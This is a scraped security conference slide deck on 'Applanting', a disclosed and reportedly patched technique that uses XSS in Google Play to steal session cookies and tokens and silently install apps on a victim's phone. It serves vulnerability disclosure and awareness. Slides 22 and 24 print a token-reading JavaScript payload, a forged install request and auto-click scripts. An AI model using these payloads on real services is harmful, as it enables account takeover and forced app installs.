lets play applanting

of 36 /36
Lets Play Applanting... Ajit Hatti (Co-Founder) Null Open Security Community

Author: phungtuyen

Post on 02-Jan-2017




2 download

Embed Size (px)


Page 1: Lets Play Applanting

Lets Play Applanting...

Ajit Hatti


Null – Open Security Community

Page 2: Lets Play Applanting




Page 3: Lets Play Applanting

Personal Research

Personal Views

Doesn't represents views of my Employer.

Vulnerabilities discussed in the paper are

fixed by Google.



Page 4: Lets Play Applanting

co-founder “n|u - open security community”

Working on Security of NetBackup Product family

at Symantec

Research on Critical Information Infrastructure


Who Am I?

Page 5: Lets Play Applanting
Page 6: Lets Play Applanting
Page 7: Lets Play Applanting
Page 8: Lets Play Applanting

Can you hack Gmail/Facebook Account?

Can you hack the banks and make big


Thank you, Questions ?

Page 9: Lets Play Applanting

Let's Play - Applanting

It involves both :

1. Hacking Gmail or a google account


2. Then Hack the Bank Accounts to make money

Page 10: Lets Play Applanting

This Paper is

About: design and gap in Google's Play store along with few

XSS vulnerabilities discovered in late last year.

Aimed : To create awareness about an interesting attack possibility

called Applanting.

Not Claims : success of the attack as Google has been very

fast and better in fixing the security issues in their services

Definetely Claims : Similar attacks in future on platform other than Android

Page 11: Lets Play Applanting


Page 12: Lets Play Applanting

Bank Identifies you by your Phone

Page 13: Lets Play Applanting

Reliable and Cheaper alternative

Page 14: Lets Play Applanting

The Concern

Your Phone Is your Identity

Page 15: Lets Play Applanting

Facebook Identifies you by your



So dose Google services…

Page 16: Lets Play Applanting

Mom, The man at the door says he is my dad, and his Mobile number is saved in your cell phone as “Rascal”, should I open the door?

Your Phone Is your Identity

Page 17: Lets Play Applanting


Lt. Col MS Dhoni, Planting Campaign

Page 18: Lets Play Applanting

The Play Ground

Page 19: Lets Play Applanting

The Rules

Page 20: Lets Play Applanting






Between the lines

Page 21: Lets Play Applanting

Possible Moves:

Steal the Cookie and then…..

Page 22: Lets Play Applanting

Possible Moves:

ljavascript:alert(initProps['userEmail'] + ' | ' + initProps['token'] + ' | ' + initProps['selectedDeviceId']);

POST /store/install HTTP/1.1

Host: play.google.com

Cookie: __utma=<cookie from XSS>

Content-Type: application/x-www-form-urlencoded;charset=utf-8

Content-Length: 139

id=com.company.app_name&device=<19 digit phone ID>&xhr=1&token=<41 char token>

Page 23: Lets Play Applanting

The Flaw

Page 24: Lets Play Applanting

Possible Moves? Javascript: document.getElementById('Install').click();

$("a").click(); //by tag.

$("a[href='#']").click(); //by tag with href property

$(".side_link").click(); //by class

$("div#someId a.side_link").click();

// This would work if the link was a child of a div with Id = someId


Page 25: Lets Play Applanting

The Goal

Page 26: Lets Play Applanting

Getting the Player to the Ground

Page 27: Lets Play Applanting

The Action

Page 28: Lets Play Applanting

What We Can do?

Page 29: Lets Play Applanting

What We Can Gain?

Page 30: Lets Play Applanting

What We Can Gain?

Page 31: Lets Play Applanting


Page 32: Lets Play Applanting

Big Thanks To

Jon Oberheide (http://jon.oberheide.org/)

Thomas Cannot (http://thomascannon.net/)


Page 33: Lets Play Applanting

Future of Applanting

Man in mobile – very powerful exploitation Vector

Applanting is about to start grow and be a Challenge

The Challenge : As a third party, you cant differentiate between

App installation by Choice or by Force

Page 34: Lets Play Applanting

Future of Applanting

Applanting on Windows 8 based phones

App-Forking -

Page 35: Lets Play Applanting


Concerns : Mobile is your strongest Identity &

single point to screw your life.

Applanting : Flaws in App stores can be leveraged to

install applications Silently.

Challenge : Cant differentiate between user chosen

application installation and Applanting.

Awareness : Make sure you did installed that app

on your mobile.

Page 36: Lets Play Applanting

Thank you All



BIG Thanks to

Team Black Hat

Vivek Ramchandran

nullcon & Jailbreak team

Lt. Col MS Dhoni,

(Inspiring India)